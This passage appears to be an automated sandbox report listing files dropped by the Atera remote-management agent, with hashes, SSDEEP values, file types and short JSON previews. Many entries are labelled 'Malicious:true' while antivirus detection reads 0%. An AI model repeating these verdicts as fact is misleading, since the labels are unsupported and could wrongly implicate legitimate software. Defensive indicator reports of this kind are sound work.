                                                                                                                                                                                                                                                                                              SHA-512:BA931F57CB51C13276BFA9B22FE7F28BAFFD0B797F4893E4FB1CCE3F66CBAA27036F982E219F1D82CD0F4DD16201FDCB2D5165F08C39B590E082921FCB33DF44
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27728
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.55235877778647
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:YSgpZUlMxR5I1z8w3Uta2lQBVMxzMJktYm+9HWXCYhNyb8E9VF6IYijSJIVxKtKH:YSCZUl2O1zCnXyzDeEpYi60ki
                                                                                                                                                                                                                                                                                              MD5:66ECB4DF9FFFE28A3AD4CF7D94F26981
                                                                                                                                                                                                                                                                                              SHA1:A10762FADF1AF95C6C685FBE130D9206F3F0B2A5
                                                                                                                                                                                                                                                                                              SHA-256:B650B86C30FF78A47698DF672994AF7B0D247D558CA5A39FC81AC809C5E97215
                                                                                                                                                                                                                                                                                              SHA-512:AAC4457E5FB735308DDC036E3CB7BD73E1151E6B8FB70919477ACBA9FF4A5F646C45F462091461A33409C20510C89E0CCFA046A4082A222F8985274F952D1F35
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41552
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.319744600570524
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:+bUqoXsEgfFHoiikZ9y3BHdD+XR/tGo06BCEpYi60U:LLrgfPw3mXREaD76d
                                                                                                                                                                                                                                                                                              MD5:DD5803D458FAB3FAA46BACBD49188A64
                                                                                                                                                                                                                                                                                              SHA1:C16F2ECDED642B9A47A973558EA9A5C5612CC6D0
                                                                                                                                                                                                                                                                                              SHA-256:A56FEB730AF4C3D615855BC12CFBE08F473CC147EC9F878D5F4EE21FC81A9CC2
                                                                                                                                                                                                                                                                                              SHA-512:3B28818A52242977094536F27EB1E75D5ED8AD3A364CB613199F2D4D7D794E2B208B3470563BE0432E8F30FF13B72416A4EB32F0FA9D96C64BD5857A2F596E02
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138320
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1600142991276
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:IobKO7RaoWuUeZk/f0Sh1HlWZm1ZZTdyGFkNUMT+P65jDt4Ni:VbKKz1UeZk/Phv8lDuPad
                                                                                                                                                                                                                                                                                              MD5:E383F6A50EB79DD0F34AA7F56CDC0C6F
                                                                                                                                                                                                                                                                                              SHA1:9355A89B24EA73429664C4B29B24C8DEDE63882F
                                                                                                                                                                                                                                                                                              SHA-256:95A1242A546713B4558DA3695B16F1A219FB1F0D5DE0F8576AA95FE475385C41
                                                                                                                                                                                                                                                                                              SHA-512:785955AE8363591057FC90491631DB316C91F2827292C84F51EEF09E1D25E7D83F2A77D3721DA27E8B1ACD1C7FFE00E83998F87ADABEE97DFC7CF82DFE5E0041
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):52304
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.147960758267006
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Ib1yYPvLtCJY0E+F3xeHwNaleirtqCVlXmL+7NQ1OaY7c0EpYi60OD6u:Ib1yYPL0E+F+8inVlXNP7cN76LWu
                                                                                                                                                                                                                                                                                              MD5:2B1314FCC0FD24FF3BBAF5CE9F477E4E
                                                                                                                                                                                                                                                                                              SHA1:F3E8311CE660FC8BDAABEA6CBDA8073138A0950C
                                                                                                                                                                                                                                                                                              SHA-256:CE284908174703B19C8F81B471C26BE0164DCA0B282A55E8D914082E99CF2D90
                                                                                                                                                                                                                                                                                              SHA-512:3D37EBECECDEAD674261F0A96FA5DC42A77F0D1C5BC60CE50273A401510D27F5B667AF68483642F784E371456A21BEF8D379FEE95EFC7D56ED3DCF9AF608BD0D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):799856
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.7597847647294211
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:g/r3V645uWOL8/pCuPHnhWgN7acW5RjroUEKup3JdqnajvsKyhr:gx6Yi/uPHRN7y/oU7aJdlrsKK
                                                                                                                                                                                                                                                                                              MD5:6A205C78D14FA91EFCA3AE531D1FF7E8
                                                                                                                                                                                                                                                                                              SHA1:9E26E81DFDBA74AE261912993DE875D13BB0891C
                                                                                                                                                                                                                                                                                              SHA-256:6444DFA03609248EFFD398E8562AF484AD0163A6C47CEE6D3A287FFDEF809AD2
                                                                                                                                                                                                                                                                                              SHA-512:FD797F528519BD9B864394C2A45AFA5C7F94F58D1F2B55E0017987FB521C9F7292DBE1366BE778E60352FA8F9A08C10B7299AEA39DEEEE3A164BB105857FE7ED
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):132200
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.172481694612173
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:/Nw50BNfe5FxLyWnongSwUp+k7bAMZ7cPd:CKNfQxRncgS7bBZ7y
                                                                                                                                                                                                                                                                                              MD5:2D13C1C8539D6FD7A0717941BF0357AF
                                                                                                                                                                                                                                                                                              SHA1:0E70EA88A866BAF660950FE74482149456557BDC
                                                                                                                                                                                                                                                                                              SHA-256:644BB3A1AFBEA6B835422B0987376F04796E38BBBECC08C94023638EEBE57F4C
                                                                                                                                                                                                                                                                                              SHA-512:A52AE3560B22C354F5CE89358219A7FA2FEAA12B376F72B8B53E6ED5E4B02703777CF1678744E7C038C29616975C0E63DFE17BFCB0A9D53B394452EC17AD979F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1841171
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.998996410254455
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:49152:Upa8rr5HRG09H3f1XA0C+KqlxzbiflngRscQXyt3lqHkHD:fIrtR3F3FA0C+KqIn68XyNlqEj
                                                                                                                                                                                                                                                                                              MD5:5ED9543E9F5826EAD203316EF0A8863D
                                                                                                                                                                                                                                                                                              SHA1:8235C0E7568EC42D6851C198ADC76F006883EB4B
                                                                                                                                                                                                                                                                                              SHA-256:33583A8E2DCF039382E80BFA855944407BCBA71976EC41C52810CB8358F42043
                                                                                                                                                                                                                                                                                              SHA-512:5B4318DDC6953F31531EE8163463259DA5546F1018C0FE671280337751F1C57398A5FD28583AFBA85E93D70167494B8997C23FEE121E67BF2F6FB4CA076E9D9F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40158
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.003264426241275
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:CY1n6EQFVThifqF5ACfcpVBHy8I3PmHPxEiPk:Co6EQFVThi05ACfIVBU3yEYk
                                                                                                                                                                                                                                                                                              MD5:692C65032C40073249CB0965EDD659C2
                                                                                                                                                                                                                                                                                              SHA1:44AFC130C955CAF911C29892BD537737B663D2A1
                                                                                                                                                                                                                                                                                              SHA-256:36400E026D030C92A3DF8C8DB791A4D1D1823B15C404D7A10EB56792FF9C0DA4
                                                                                                                                                                                                                                                                                              SHA-512:9A5B1D1245CD248DB960BD93B35D4403EFE6AF2F6FAF188D57CA181D20C9E0CB695EEF0275AB840A5B5F632E5724CD8832647054C9F7CF3AA7FC52788107877A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:{.. "runtimeTarget": {.. "name": ".NETCoreApp,Version=v8.0",.. "signature": "".. },.. "compilationOptions": {},.. "targets": {.. ".NETCoreApp,Version=v8.0": {.. "Agent.Package.Watchdog/2.0": {.. "dependencies": {.. "Atera.Agent.Package.Infrastructure": "1.2.7",.. "Atera.Agent.Package.Tools": "1.0.26",.. "System.ServiceProcess.ServiceController": "8.0.0",.. "TaskScheduler": "2.10.1".. },.. "runtime": {.. "Agent.Package.Watchdog.dll": {}.. }.. },.. "Atera.Agent.Package.Infrastructure/1.2.7": {.. "dependencies": {.. "Microsoft.Extensions.Hosting": "8.0.0",.. "Newtonsoft.Json": "13.0.3",.. "Polly": "8.4.1",.. "Serilog.Extensions.Hosting": "8.0.0",.. "Serilog.Sinks.File": "6.0.0".. },.. "runtime": {.. "lib/net8.0/Atera.Agent.Package.Infrastructure.dll": {.. "assemblyVersion": "1.2.7.0",.. "fileVe
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):35408
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.445343698989786
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:4HjRXMp49TtCTj2Smpb375kGb1jfXCHcaaTsHmdVuE8mEm+w/DX3fSdQHFtNyb8k:mjRXEqzbL5vBCH3+Vud4DnXlJEpYi60p
                                                                                                                                                                                                                                                                                              MD5:E5401312C2582DDB397568F5A38EDC7A
                                                                                                                                                                                                                                                                                              SHA1:394F35A672F3AF89E73D0C1E3FF468F901191E47
                                                                                                                                                                                                                                                                                              SHA-256:02866CD2A0131FAEB14807A56D70B1674073B6AF19645587DF805D94F60C6ED7
                                                                                                                                                                                                                                                                                              SHA-512:5E0D72A5AD219535DA646C2E1219F43D7E2A764F6592D849BE69D9B9C2E6EA7C6427647FBEC6BEFF2F3B7E423B3FE4AADB2EF91549AB05E01CDA30CCAED0E59F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):149072
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.214160487040559
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:BhK4Uay3XrQ8habqgp9pC9Z6p5uf3C6k0xuZ04ntfx9hBui11:BhK4XycqgpfCup5sVxuZ041hAW
                                                                                                                                                                                                                                                                                              MD5:2B9BEB2FDBC41AFC48D68D32EF41DD08
                                                                                                                                                                                                                                                                                              SHA1:4A9EA4CF8E02E34EF2DD0EF849FFC0CD9EA6F91C
                                                                                                                                                                                                                                                                                              SHA-256:977D48979E30A146417937D7E11B26334EDEC2ABDDFAE1369A9C4348E34857B1
                                                                                                                                                                                                                                                                                              SHA-512:3E3C3E39FF2DF0D1ED769E6C5ACBA6F7C5D2737D3C426FB4F0E19F3CF6C604707155917584E454A3F208524ED46766B7A3D2D861FA7419F8258C3B6022238E10
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7004397181410926
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhXLVy:WBLs
                                                                                                                                                                                                                                                                                              MD5:F9769BB20BC8A0F137207AC2FA70E73A
                                                                                                                                                                                                                                                                                              SHA1:13A5ADE4ADC04D610CEFD3BACE0B749E33F6FAEE
                                                                                                                                                                                                                                                                                              SHA-256:F117E5835146FCDF2013C5554138C304B5376A1F3E3F1B6C6D1DB0DCD6C998C4
                                                                                                                                                                                                                                                                                              SHA-512:BE47552F6B063FFF51102EC421B3860773FA9F51800F6C2988C5C67BA56DB8E374C2FB048EF6BB0D988620FDC04A2A6ADFBF2A06465E4D4F34BA623B92E5F01B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=2.0..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):375
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.718662743683283
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:3Hp/hdNyhA0Hv3Opo/XCkyFNOJeZS1MZeQ6NOCUo+K8E7/OyPfKmn5BNTy:dFGv3OpJ5MeU14hex+K8E7nS2r2
                                                                                                                                                                                                                                                                                              MD5:E8D9109BD15637B1FBF349F9C7FF776F
                                                                                                                                                                                                                                                                                              SHA1:19762DAA20AFC8085BA6417A7215F1FE2D619F60
                                                                                                                                                                                                                                                                                              SHA-256:C4A84CDD787CB31AAA46E8282F7D288F0641FDAA4252AC78979340131C8B9110
                                                                                                                                                                                                                                                                                              SHA-512:5CC792C0CDF32C4C893EEBC6651AABED7428D2F467B58D3B58AD21DFCE9DD4EE0924257B4699297F6D41069F27829CE8B8A711642F3208981761B48382D68B74
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:{.. "runtimeOptions": {.. "tfm": "net8.0",.. "rollForward": "LatestMajor",.. "framework": {.. "name": "Microsoft.NETCore.App",.. "version": "8.0.0".. },.. "configProperties": {.. "System.Reflection.Metadata.MetadataUpdater.IsSupported": false,.. "System.Runtime.Serialization.EnableUnsafeBinaryFormatterSerialization": false.. }.. }..}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):53840
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.293090921966287
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:fRPeTQrT7/+DeXAsrdacchYyoF9sXduwzufEpYi6082R:9hBUh+NF9sd6Y76MR
                                                                                                                                                                                                                                                                                              MD5:04EEF96CADF921F00359976AA955D093
                                                                                                                                                                                                                                                                                              SHA1:3DB9D89AB01D6F39427B3EB63BA87E98EAF6B3EE
                                                                                                                                                                                                                                                                                              SHA-256:996B85B40022A64D7B2BBDCEA5D51171EEAE6F8A3936279C2451A65554DCBAE3
                                                                                                                                                                                                                                                                                              SHA-512:5F8A8814A5854BE34309BC5D9F3C528EA3A426ABC16BD23226051200E38746B8497E97E32580ACBBEC369635885295FF7375998C10C68690D34669E823836311
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):70224
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.253576832389666
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:9a5mhZg6DVOVZF85MrFvPg6VivoTLGGq5MnAEJJBIba9kEpYi60bzg:wohZwVL85MrFn1gsGGq5MnpxIb6d76Es
                                                                                                                                                                                                                                                                                              MD5:C954777CF815CEAC6BE1E29BA6B5CF98
                                                                                                                                                                                                                                                                                              SHA1:A1C895366DA03839680237CE8D3F49EF8F839449
                                                                                                                                                                                                                                                                                              SHA-256:EC94D14AEFCAE5C0D75633A1E7AA3C578AA67D965BB337D98783F3802E7E893F
                                                                                                                                                                                                                                                                                              SHA-512:8C65380376B653715882C6A290F61D1F67948DCEAD8CD47CA2E766F91CBAC70824C12885BD4C671C91E235B6F1BB6EDFF3EEF223B3F8E6D6201B54E1D6975F90
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):193616
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.0038612181162465
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:9hakSdKo5IgGu6BXZbYOWribVM+kqCfo8OECZjmuaK1R1J3yjLGe5X3YOt:9hVSMtM+zNL1JivGehv
                                                                                                                                                                                                                                                                                              MD5:D95241F92AEA199B23D972094C7761A7
                                                                                                                                                                                                                                                                                              SHA1:80FEDECDA98D05F8FD7AF3B5AEB2E4448B761303
                                                                                                                                                                                                                                                                                              SHA-256:B6DB510896DD31DF655654426478D669AACA8CA4B06A575A46EA7256C6419ACF
                                                                                                                                                                                                                                                                                              SHA-512:A93F48CBA7C728B46602D09206C1D854E170CD64A8F9038577438F10417CE835A966F29F4A4E1CE93A529960CEEB7A81D8E4562A90F27B05C460213099CCC6F1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27728
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.50639372294577
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:pxrv7hVmaET50kv96TG/FwzzRjz6qMvckxGMCWsfNWONyb8E9VF6IYijSJIVxIWZ:f7hUaETSkXZp32REpYi60bRt
                                                                                                                                                                                                                                                                                              MD5:6D9E346F5743696D9067F4D2F119FE37
                                                                                                                                                                                                                                                                                              SHA1:E1D731DC2B4EB5302E68FD62A3B7551396CDC4AB
                                                                                                                                                                                                                                                                                              SHA-256:A0118B5134DE26ABCDBA3EA8EA27870F02B8C449BA901C562E0CE410FB1CF7D1
                                                                                                                                                                                                                                                                                              SHA-512:491456754EFB187216BCD455A8F5EFE835BCA015D14DD062434C9F28176442547DEF5B092988073AC0096E441A0EE293CD227C839523D3AC18417F1808C5945C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):42576
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.318325319304968
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:XrGlacqr6kPubIQGxeVdrxiUCEpYi60rjZm:Xrf36kEIQGx8xiUD76J
                                                                                                                                                                                                                                                                                              MD5:1B89907495D9E16AF1D245E70DD3B040
                                                                                                                                                                                                                                                                                              SHA1:C1CD267FCEF8ECB547CE348F1D6DD6D4EBB821B0
                                                                                                                                                                                                                                                                                              SHA-256:BE30F976789479A0B88E472FC0E355F3B4BF32EBB439676CB9EDAD5C341A7263
                                                                                                                                                                                                                                                                                              SHA-512:63CDC73F7AEA1832E31336EE2738E3EAD40882E4E443C604CE8D45F21E57B133E2E50FB955D6E23162F0829AEB67273BD4BD9D8D0FB327B0474A252D32464A45
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):24656
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.61779167641697
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:D+6wnFbhCxwXaHsRJ0eDKfW9/nWWNyb8E9VF6IYijSJIVx5Oyxu:S6+FN04IcCSnEpYi60wMu
                                                                                                                                                                                                                                                                                              MD5:991002049E26CA5B2F1AE2DD525C995C
                                                                                                                                                                                                                                                                                              SHA1:630C6A965285423D4BA3ED23F0D046BFE2DCBF18
                                                                                                                                                                                                                                                                                              SHA-256:35E41A3220E417F64426E191B172C935C3A06B49A5C23207A886BE9E04833E7D
                                                                                                                                                                                                                                                                                              SHA-512:3B342C8200FD8AEEA4057E5CE724C7EFF1306F2F27B09C4ABC8868F91B73767976A277A1F8B9A3CF35304F293E107E76182355E48DAE4BEFFD0F1F14A4D04FEF
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):21072
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.623257262935385
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:gSh0UpsW+K0ihWQS9WUPeWYNyb8E9VF6IYijSJIVxJbhlom:gS0ULPUrQEpYi60JVj
                                                                                                                                                                                                                                                                                              MD5:9FD144D2E62A95A18E337E8234713171
                                                                                                                                                                                                                                                                                              SHA1:A3677314A8C263BDB532B378F7D951DECED6733A
                                                                                                                                                                                                                                                                                              SHA-256:2C74962DDE702D8181CD01826472F568BFF70429D4F3F0977903DE788E128FA3
                                                                                                                                                                                                                                                                                              SHA-512:95D6D30ADA5F4BBD45A10637CC3CFE1A243BF42FE7FFCE1DC81554172C4D11A6527DFCC79FD540180E34CDE478693AB1E758F28D51E3AF6B887813CAB5AFB170
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27728
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.526471694241477
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:MMczpIwUCdKetxyFCLJNsLghXABAqWqf6WeNyb8E9VF6IYijSJIVxF8g31E:Zct7lVtfMewAECEpYi60ygK
                                                                                                                                                                                                                                                                                              MD5:D1837FA6A46594200AEF84C6CB5425D4
                                                                                                                                                                                                                                                                                              SHA1:53E476EF21C281C224A9DDFD63DE95EEB9583460
                                                                                                                                                                                                                                                                                              SHA-256:45C26D14110073F193E86891F420B706FB2CA63208C37562BB471AFA80AF9E74
                                                                                                                                                                                                                                                                                              SHA-512:AD314103A274CBE62A647B4B59B0E99724A1CA4DCB52FE516D6E5C3FB0BAC39CADB4E6FA99D573BBCAB5F6E238B3E37B1067D3E45FE7C4DBC4ED80ED68424706
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
